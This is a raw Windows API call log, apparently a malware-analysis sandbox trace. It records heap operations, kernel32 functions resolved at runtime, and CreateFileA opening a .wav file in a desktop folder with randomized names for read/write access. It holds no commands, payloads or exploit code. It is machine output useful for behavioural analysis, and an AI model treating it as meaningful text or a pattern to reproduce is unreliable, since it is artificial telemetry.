[0031.545] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0031.545] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0031.545] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0031.545] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0031.545] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0031.545] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0031.545] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0031.545] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0031.545] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0031.545] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0031.545] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0031.545] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0031.545] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0031.545] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x889b08 [0031.545] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x889b08, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0031.545] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0031.545] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0031.545] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0031.545] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0031.545] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0031.545] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0031.545] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0031.545] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0031.545] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0031.546] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889b08 [0031.546] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x889b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0031.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0031.546] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0031.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0031.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0031.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0031.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0031.546] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0031.546] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0031.546] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0031.546] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0031.546] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0031.546] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0031.546] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0031.546] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0031.546] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0x935008 [0031.546] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav", cchWideChar=113, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 113 [0031.546] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x71) returned 0x7800d0 [0031.546] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav", cchWideChar=113, lpMultiByteStr=0x7800d0, cbMultiByte=113, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav", lpUsedDefaultChar=0x0) returned 113 [0031.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7800d0 | out: hHeap=0x770000) returned 1 [0031.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0031.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0031.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0031.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0031.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0031.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0031.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0031.546] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0031.546] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\tjni\\lk15vz5k\\wtgkl2xg7q876lp8absn\\uzxbvza9thehqnqn.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0031.547] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0031.547] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0031.547] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0031.547] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0031.547] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0031.547] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0031.547] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0031.547] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0031.547] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0031.547] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0031.547] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0031.547] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0031.547] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0031.547] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0031.547] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x935008, cbMultiByte=113, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 113 [0031.547] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xe2) returned 0x7c5448 [0031.547] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x935008, cbMultiByte=113, lpWideCharStr=0x7c5448, cchWideChar=113 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\lK15Vz5k\\wTgKl2xg7Q876LP8ABsN\\uzxBvZA9ThehQNQn.wav") returned 113 [0031.547] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0031.547] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xf0) returned 0x7c50e0 [0031.547] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0031.547] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0031.547] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0031.547] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0031.547] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0031.547] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0031.547] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0031.547] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0031.547] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0031.547] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0031.547] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0031.547] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0031.547] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0031.548] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0031.548] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0031.548] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0031.548] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0031.548] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0031.548] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0031.548] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0031.548] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0031.548] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0031.548] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0031.548] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0031.548] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0031.548] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0031.548] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0031.548] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0031.548] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0031.548] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0031.548] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0031.548] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0031.548] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0031.548] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0031.548] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0031.548] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0031.548] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0031.548] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0031.548] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0031.548] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0031.548] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0031.548] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0031.548] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0031.548] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0031.548] FreeLibrary (hLibModule=0x76e10000) returned 1 [0031.548] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0031.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0031.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0031.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0031.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0031.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0031.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0031.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0031.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0031.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0031.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0031.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0031.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0031.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0031.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0031.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0031.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0031.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0031.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0031.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0031.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0031.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0031.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0031.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0031.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0031.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0031.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0031.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0031.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0031.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0031.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0031.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0031.550] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0031.550] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0031.550] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0031.550] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0031.550] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0031.550] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0031.550] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0031.550] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0031.550] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0031.550] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0031.550] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0031.550] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0031.550] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0031.550] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0031.550] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0031.550] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0031.550] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0031.550] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0031.550] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0031.550] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0031.550] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0031.550] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0031.550] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0031.550] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0031.550] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0031.550] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0031.550] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0031.550] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0031.551] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0031.551] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0031.551] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0031.551] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0031.551] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0031.551] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0031.551] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0031.551] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0031.551] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0031.551] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0031.551] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0031.551] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0031.551] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0031.551] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0031.551] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0031.551] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0031.551] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0031.551] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0031.551] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0031.551] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0031.551] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0031.551] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0031.551] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0031.551] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0031.551] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0031.551] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0031.551] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0031.551] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0031.551] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0031.551] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0031.551] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0031.551] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0031.552] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0031.552] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0031.552] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0031.552] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0031.552] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0031.552] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0031.552] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0031.552] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0031.552] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0031.552] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0031.552] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0031.552] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0031.552] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0031.552] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0031.552] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8891f0 [0031.552] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x8891f0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0031.552] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0031.552] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0031.552] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0031.552] 